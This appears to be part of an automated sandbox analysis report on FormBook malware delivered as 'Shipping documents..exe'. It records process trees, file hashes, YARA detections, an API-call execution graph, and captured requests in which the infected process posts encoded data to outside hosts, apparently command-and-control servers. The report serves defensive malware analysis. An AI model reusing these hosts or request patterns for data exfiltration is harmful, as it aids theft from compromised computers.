                                                                                                        Data Ascii: DDp=FAcToKpjOSrSNfSo4L7kFairw9yPkmTyfNYgkg3FiJ97bYONMfao0ovODlFJBd1MMAWxfwXWzgD56crv8J+9CptpOcp9aPG6XHtz0I0KKq6Gy652NR3DJuSRQbrDuCNW/Qpv5zz5+SA/WMM7npYSUZZhgDL3oCaShDaV6ZqViivSrSFZpyHg4uIiTVFVMYyqVugNANafmbXWaWZT1P5MkMgirvOXVZYzIvMr1Xufeh6Vu/I3OOcj5QU9UdLKpuLkyD06/YYPISuF2Fx3yeMTkjlCsV42KzHNiNvT8dYzkvbv+B4N+LL4ZxFamdhsg/W/qlwUqBxjUHOqeVT0HNVjlebhwF20k6ISD5ofN61Y+DpxtqLRH6nNCGVzOGYcyNWbDqM9SoWmaHQ2ZC6Edna8rTw7Pmk60BpfJ96yaIGre6j+Al71sCVkNhkJzFT6rRovxHYH8HDdzBV9WerUfi/s9T8ZxQoWAanJ4htbc6tofSIVwVvcL4PoH8bMcgSTYDWDr5+19T1t8EyjkAZZuc+pJarDK3gEXaLh7CBjpGNTCbdfxnPoU7p753Bg5uCGCCUyHxL4sQIG8w1dGFEnTUWIx4YEXC6Z5LRpp0bUWtWZGU1KHp+/djH8Vy/Pb+AkcWBRp7vsPWJZpDY55+x1MhFOpz3wiOoyNhNdArqJawgup+H7kSBBjJxBbfGkmmV22UMgdq3+qKCeZQQBLtdS/zo7Bjzhs1PMsuA8+g/gVIzCjHnuHlbNuKmmC1pv9Q8xtfkIOREZhP/E9hG7M1sSpxW5RVCDlwXsDsZNUMPNf6auX5pt2C8V15SVJFXrfJAyFn8+/5uaja/+DMRBRMq/1M7/7uIeNWlG/JDgK1OFGflFAjaEimDIok12B9ddknBL1M2Pyc42iqqoNQYXG00Is7aCxVnTFwGVbHeykp5BJatvTm449F83ythoFpAkDPC2g/8S3ECmToGfEqrJDiOY4d4bkYD1mEepKfKeHYk+JaCXbm4MTJaK [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:49.746179104 CET857INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 06 Nov 2024 07:42:49 GMT
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Content-Length: 41
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        Access-Control-Allow-Origin: http://www.bzxs.info
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J%2BIdzOhV%2BNsQyEDRu2YIGw2USrCs%2FYsV71Hm2Sf9sl2JdXgkN2kA7T1sR953SWFX56WEX%2F2uRvG8o%2FXACYvwWy6O8ylhbY39fEnxbIRUV7z7xV5TYEwk%2B3xnn35jo8dT"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de372f5ddf82d35-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1300&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1835&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 7b 22 63 6f 64 65 22 3a 38 30 34 30 34 2c 22 6d 73 67 22 3a 22 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"code":80404,"msg":"Resource not found"}


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        52192.168.2.650037188.114.97.3804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:51.283243895 CET546OUTGET /v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.bzxs.info
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:42:52.286896944 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 06 Nov 2024 07:42:52 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Vary: Origin
                                                                                                        set-cookie: locale=en-us; path=/; max-age=31557600; expires=Thu, 06 Nov 2025 13:42:52 GMT
                                                                                                        x-xss-protection: 1; mode=block
                                                                                                        x-content-type-options: nosniff
                                                                                                        x-download-options: noopen
                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ntPc25kEmC1ajuXatwuxMIq6piB7pNnnQ65qnRVu8s%2BGHY2NrPrkq7aSPYtKLT1tQ93dfg%2Fu8SmpG9zppjvFcsygWpBA6OxSDM7SArddCEF%2BbMRzij2I9JzTX60x%2FSxj"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8de37305bc04e9bd-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=546&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 31 38 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 7a 68 2d 43 4e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e e5 bd ac e5 b1 95 e5 b0 8f e8 af b4 e7 bd 91 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61
                                                                                                        Data Ascii: 18f6<!DOCTYPE html><html lang=zh-CN><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title></title><meta na
                                                                                                        Nov 6, 2024 08:42:52.286912918 CET1236INData Raw: 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 e5 bd ac e5 b1 95 e5 b0 8f e8 af b4 e7 bd 91 2c 20 e5 8e 86 e5 8f b2 2c 20 e7 a9 bf e8 b6 8a 2c 20 e7 bd 91 e6 b8 b8 2c 20 e5 85 8d e8 b4 b9 e5 85 a8 e6 9c ac 2c 20 e9 9d 92 e6 98 a5
                                                                                                        Data Ascii: me=keywords content=", , , , , , , , , , , , , , ,
                                                                                                        Nov 6, 2024 08:42:52.286927938 CET424INData Raw: 84 e6 ba 90 e5 85 8d e8 b4 b9 e4 b8 8b e8 bd bd 2c 20 e5 b0 8f e8 af b4 e4 b9 a6 e7 b1 8d e5 b9 b3 e5 8f b0 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 e5 bd ac e5 b1 95 e5 b0 8f e8 af b4
                                                                                                        Data Ascii: , "><meta name=description content=" -
                                                                                                        Nov 6, 2024 08:42:52.286940098 CET1236INData Raw: e5 b0 8f e8 af b4 e7 83 ad e9 97 a8 e8 af 9d e9 a2 98 e5 b0 8f e8 af b4 e4 bd 9c e8 80 85 e4 b8 93 e6 a0 8f e5 b0 8f e8 af b4 e7 ab a0 e8 8a 82 e7 9b ae e5 bd 95 e5 b0 8f e8 af b4 e5 ae 8c e7 bb 93 e4 bd 9c e5 93 81 e5 b0 8f e8 af b4 e8 bf 9e e8
                                                                                                        Data Ascii:
                                                                                                        Nov 6, 2024 08:42:52.286948919 CET1236INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 74 61 67 2f 22 2b 69 3b 0a 20 20 20 20 20 20 20 20 79 3d 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 72 29 5b 30 5d 3b 79 2e 70 61 72 65 6e 74 4e 6f 64 65 2e
                                                                                                        Data Ascii: tps://www.clarity.ms/tag/"+i; y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y); })(window, document, "clarity", "script", "nvh240mhbp");</script></head><body><header class=container><div id=navbar><a href=/ class=brand
                                                                                                        Nov 6, 2024 08:42:52.286959887 CET1236INData Raw: 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 69 74 65 6d 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 65 67 71 62 2e 74 6f 70 20 63 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 6c 69 6e 6b 3e e5 b0 94 e5 86 a0 e5 b0 8f e8 af b4 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                                                                        Data Ascii: lass=domain-item><a href=https://egqb.top class=domain-link></a></li><li class=domain-item><a href=https://mgnxs.com class=domain-link></a></li><li class=domain-item><a href=https://aiqb.top class=domain-link>
                                                                                                        Nov 6, 2024 08:42:52.287024021 CET868INData Raw: 68 74 74 70 73 3a 2f 2f 73 74 7a 71 62 2e 63 6f 6d 20 63 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 6c 69 6e 6b 3e e7 9b 9b e9 80 9a e5 b0 8f e8 af b4 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 64 6f 6d 61 69 6e 2d 69 74 65 6d 3e 3c 61 20
                                                                                                        Data Ascii: https://stzqb.com class=domain-link></a></li><li class=domain-item><a href=https://dhqb.info class=domain-link></a></li><li class=domain-item><a href=https://zeqb.info class=domain-link></a></li><li class=do


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        53192.168.2.6500383.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:58.038606882 CET828OUTPOST /azb9/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.econsultoria.online
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.econsultoria.online
                                                                                                        Referer: http://www.econsultoria.online/azb9/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 71 49 51 66 65 65 2f 51 68 46 57 48 39 5a 32 54 4f 51 56 76 55 6b 49 2b 38 34 38 5a 55 78 6b 6e 59 51 37 2f 34 50 6f 48 6d 63 4d 6e 58 4c 47 58 4e 41 63 54 58 74 4f 6d 30 37 51 76 51 67 70 47 6d 5a 4d 4b 51 49 34 35 37 31 79 6f 50 47 58 61 51 79 4d 39 34 41 4f 42 48 32 2f 79 45 54 34 56 62 4c 44 6d 42 6b 73 55 6f 7a 68 34 36 4c 50 6b 67 48 6d 31 45 30 30 64 79 50 38 73 41 72 6f 5a 50 44 56 61 69 52 61 4b 66 4f 77 50 2b 58 66 37 34 37 4a 35 4f 65 38 34 66 59 4c 6e 4e 7a 6f 70 56 41 66 63 50 6a 31 65 47 6d 7a 4d 6e 38 59 70 37 70 34 2b 4b 38 71 6e 6e 7a 61 35 75 51 6f 61 35 49 6b 38 74 79 46 52 62 4a 52 77
                                                                                                        Data Ascii: DDp=qIQfee/QhFWH9Z2TOQVvUkI+848ZUxknYQ7/4PoHmcMnXLGXNAcTXtOm07QvQgpGmZMKQI4571yoPGXaQyM94AOBH2/yET4VbLDmBksUozh46LPkgHm1E00dyP8sAroZPDVaiRaKfOwP+Xf747J5Oe84fYLnNzopVAfcPj1eGmzMn8Yp7p4+K8qnnza5uQoa5Ik8tyFRbJRw


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        54192.168.2.6500393.33.130.190804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:43:00.580977917 CET852OUTPOST /azb9/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.econsultoria.online
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.econsultoria.online
                                                                                                        Referer: http://www.econsultoria.online/azb9/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 71 49 51 66 65 65 2f 51 68 46 57 48 39 34 47 54 4a 7a 74 76 42 55 49 2f 35 34 38 5a 4e 68 6c 67 59 51 33 2f 34 4b 4e 66 6d 75 59 6e 55 71 32 58 4d 42 63 54 55 74 4f 6d 38 62 51 71 55 67 70 4e 6d 5a 42 35 51 4b 73 35 37 30 57 6f 50 43 48 61 51 44 4d 2b 35 51 4f 48 4d 57 2f 77 5a 6a 34 56 62 4c 44 6d 42 67 4d 36 6f 7a 35 34 36 61 2f 6b 68 69 4b 32 62 45 30 53 2f 66 38 73 45 72 6f 64 50 44 56 6f 69 51 32 7a 66 4b 41 50 2b 56 48 37 34 71 4a 2b 45 65 38 32 52 34 4b 33 4b 54 6c 32 58 6d 4f 6a 52 78 77 38 57 31 2f 4c 6d 4b 46 7a 6e 61 34 64 59 73 4b 6c 6e 78 43 4c 75 77 6f 77 37 49 63 38 2f 6c 4a 32 55 39 30 54 37 63 46 6e 53 66 6d 56 4c 74 4d 42 71 50 31 42 79 2f 63 39 59 41 3d 3d
                                                                                                        Data Ascii: DDp=qIQfee/QhFWH94GTJztvBUI/548ZNhlgYQ3/4KNfmuYnUq2XMBcTUtOm8bQqUgpNmZB5QKs570WoPCHaQDM+5QOHMW/wZj4VbLDmBgM6oz546a/khiK2bE0S/f8sErodPDVoiQ2zfKAP+VH74qJ+Ee82R4K3KTl2XmOjRxw8W1/LmKFzna4dYsKlnxCLuwow7Ic8/lJ2U90T7cFnSfmVLtMBqP1By/c9YA==


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:02:38:54
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Users\user\Desktop\Shipping documents..exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\Shipping documents..exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1'322'107 bytes
                                                                                                        MD5 hash:3FBAB2B42254852FC8D71F14B2862A43
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:02:38:55
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\Shipping documents..exe"
                                                                                                        Imagebase:0x490000
                                                                                                        File size:46'504 bytes
                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:02:39:19
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe"
                                                                                                        Imagebase:0x3c0000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:02:39:21
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\srdelayed.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                                                                        Imagebase:0x620000
                                                                                                        File size:16'384 bytes
                                                                                                        MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:02:39:21
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\ktmutil.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                                                                        Imagebase:0x830000
                                                                                                        File size:15'360 bytes
                                                                                                        MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:02:39:34
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe"
                                                                                                        Imagebase:0x3c0000
                                                                                                        File size:140'800 bytes
                                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:02:39:47
                                                                                                        Start date:06/11/2024
                                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                        Imagebase:0x7ff728280000
                                                                                                        File size:676'768 bytes
                                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.4%
                                                                                                          Dynamic/Decrypted Code Coverage:1.5%
                                                                                                          Signature Coverage:9.5%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:37
                                                                                                          execution_graph 85711 4010e0 85714 401100 85711->85714 85713 4010f8 85715 401113 85714->85715 85717 401120 85715->85717 85718 401184 85715->85718 85719 40114c 85715->85719 85745 401182 85715->85745 85716 40112c DefWindowProcW 85716->85713 85717->85716 85773 401000 Shell_NotifyIconW setSBCS 85717->85773 85752 401250 85718->85752 85721 401151 85719->85721 85722 40119d 85719->85722 85726 401219 85721->85726 85727 40115d 85721->85727 85724 4011a3 85722->85724 85725 42afb4 85722->85725 85723 401193 85723->85713 85724->85717 85732 4011b6 KillTimer 85724->85732 85733 4011db SetTimer RegisterWindowMessageW 85724->85733 85768 40f190 10 API calls 85725->85768 85726->85717 85737 401225 85726->85737 85730 401163 85727->85730 85734 42b01d 85727->85734 85735 42afe9 85730->85735 85736 40116c 85730->85736 85731 42b04f 85774 40e0c0 74 API calls setSBCS 85731->85774 85767 401000 Shell_NotifyIconW setSBCS 85732->85767 85733->85723 85742 401204 CreatePopupMenu 85733->85742 85734->85716 85772 4370f4 52 API calls 85734->85772 85770 40f190 10 API calls 85735->85770 85736->85717 85744 401174 85736->85744 85775 468b0e 74 API calls setSBCS 85737->85775 85742->85713 85769 45fd57 65 API calls setSBCS 85744->85769 85745->85716 85746 42afe4 85746->85723 85747 42b00e 85771 401a50 336 API calls 85747->85771 85748 4011c9 PostQuitMessage 85748->85713 85751 42afdc 85751->85716 85751->85746 85753 401262 setSBCS 85752->85753 85754 4012e8 85752->85754 85776 401b80 85753->85776 85754->85723 85756 40128c 85757 4012d1 KillTimer SetTimer 85756->85757 85758 4012bb 85756->85758 85759 4272ec 85756->85759 85757->85754 85760 4012c5 85758->85760 85761 42733f 85758->85761 85762 4272f4 Shell_NotifyIconW 85759->85762 85763 42731a Shell_NotifyIconW 85759->85763 85760->85757 85766 427393 Shell_NotifyIconW 85760->85766 85764 427348 Shell_NotifyIconW 85761->85764 85765 42736e Shell_NotifyIconW 85761->85765 85762->85757 85763->85757 85764->85757 85765->85757 85766->85757 85767->85748 85768->85723 85769->85751 85770->85747 85771->85745 85772->85745 85773->85731 85774->85745 85775->85746 85777 401b9c 85776->85777 85797 401c7e 85776->85797 85798 4013c0 52 API calls 85777->85798 85779 401bac 85780 42722b LoadStringW 85779->85780 85781 401bb9 85779->85781 85783 427246 85780->85783 85799 402160 85781->85799 85813 40e0a0 52 API calls 85783->85813 85784 401bcd 85786 427258 85784->85786 85787 401bda 85784->85787 85814 40d200 52 API calls 2 library calls 85786->85814 85787->85783 85788 401be4 85787->85788 85812 40d200 52 API calls 2 library calls 85788->85812 85791 427267 85792 401bf3 setSBCS _wcscpy _wcsncpy 85791->85792 85793 42727b 85791->85793 85796 401c62 Shell_NotifyIconW 85792->85796 85815 40d200 52 API calls 2 library calls 85793->85815 85795 427289 85796->85797 85797->85756 85798->85779 85800 426daa 85799->85800 85801 40216b _wcslen 85799->85801 85829 40c600 85800->85829 85804 402180 85801->85804 85805 40219e 85801->85805 85803 426db5 85803->85784 85816 403bd0 52 API calls moneypunct 85804->85816 85817 4013a0 52 API calls 85805->85817 85808 402187 _memmove 85808->85784 85809 4021a5 85810 426db7 85809->85810 85818 4115d7 85809->85818 85812->85792 85813->85792 85814->85791 85815->85795 85816->85808 85817->85809 85819 4115e1 _malloc 85818->85819 85821 4115fb 85819->85821 85824 4115fd std::exception::exception 85819->85824 85834 4135bb 85819->85834 85821->85808 85822 41163b 85849 4180af 46 API calls std::exception::operator= 85822->85849 85824->85822 85848 41130a 51 API calls __cinit 85824->85848 85825 411645 85850 418105 RaiseException 85825->85850 85828 411656 85830 40c619 85829->85830 85831 40c60a 85829->85831 85830->85803 85831->85830 85857 4026f0 85831->85857 85833 426d7a _memmove 85833->85803 85835 413638 _malloc 85834->85835 85838 4135c9 _malloc 85834->85838 85856 417f77 46 API calls __getptd_noexit 85835->85856 85836 4135d4 85836->85838 85851 418901 46 API calls __NMSG_WRITE 85836->85851 85852 418752 46 API calls 5 library calls 85836->85852 85853 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 85836->85853 85838->85836 85840 4135f7 RtlAllocateHeap 85838->85840 85843 413624 85838->85843 85846 413622 85838->85846 85840->85838 85841 413630 85840->85841 85841->85819 85854 417f77 46 API calls __getptd_noexit 85843->85854 85855 417f77 46 API calls __getptd_noexit 85846->85855 85848->85822 85849->85825 85850->85828 85851->85836 85852->85836 85854->85846 85855->85841 85856->85841 85858 426873 85857->85858 85859 4026ff 85857->85859 85864 4013a0 52 API calls 85858->85864 85859->85833 85861 42687b 85862 4115d7 52 API calls 85861->85862 85863 42689e _memmove 85862->85863 85863->85833 85864->85861 85865 40bd20 85866 428194 85865->85866 85867 40bd2d 85865->85867 85869 40bd43 85866->85869 85871 4281bc 85866->85871 85874 4281b2 85866->85874 85868 40bd37 85867->85868 85888 4531b1 85 API calls 5 library calls 85867->85888 85877 40bd50 85868->85877 85887 45e987 86 API calls moneypunct 85871->85887 85886 40b510 VariantClear 85874->85886 85876 4281ba 85878 426cf1 85877->85878 85879 40bd63 85877->85879 85898 44cde9 52 API calls _memmove 85878->85898 85889 40bd80 85879->85889 85882 40bd73 85882->85869 85883 426cfc 85899 40e0a0 52 API calls 85883->85899 85885 426d02 85886->85876 85887->85867 85888->85868 85890 40bd8e 85889->85890 85897 40bdb7 _memmove 85889->85897 85891 40bded 85890->85891 85892 40bdad 85890->85892 85890->85897 85894 4115d7 52 API calls 85891->85894 85900 402f00 85892->85900 85895 40bdf6 85894->85895 85896 4115d7 52 API calls 85895->85896 85895->85897 85896->85897 85897->85882 85898->85883 85899->85885 85901 402f0c 85900->85901 85902 402f10 85900->85902 85901->85897 85903 4115d7 52 API calls 85902->85903 85904 4268c3 85902->85904 85905 402f51 moneypunct _memmove 85903->85905 85905->85897 85906 425ba2 85911 40e360 85906->85911 85908 425bb4 85927 41130a 51 API calls __cinit 85908->85927 85910 425bbe 85912 4115d7 52 API calls 85911->85912 85913 40e3ec GetModuleFileNameW 85912->85913 85928 413a0e 85913->85928 85915 40e421 _wcsncat 85931 413a9e 85915->85931 85918 4115d7 52 API calls 85919 40e45e _wcscpy 85918->85919 85934 40bc70 85919->85934 85923 40e4a9 85923->85908 85924 4115d7 52 API calls 85925 40e4a1 _wcscat _wcslen _wcsncpy 85924->85925 85925->85923 85925->85924 85926 401c90 52 